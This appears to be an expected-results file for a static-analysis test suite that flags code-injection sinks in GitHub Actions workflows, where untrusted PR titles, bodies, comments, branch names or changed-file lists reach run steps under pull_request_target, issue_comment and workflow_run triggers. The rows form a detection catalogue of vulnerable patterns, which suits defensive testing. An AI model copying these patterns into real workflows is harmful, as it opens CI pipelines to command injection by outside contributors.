steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| 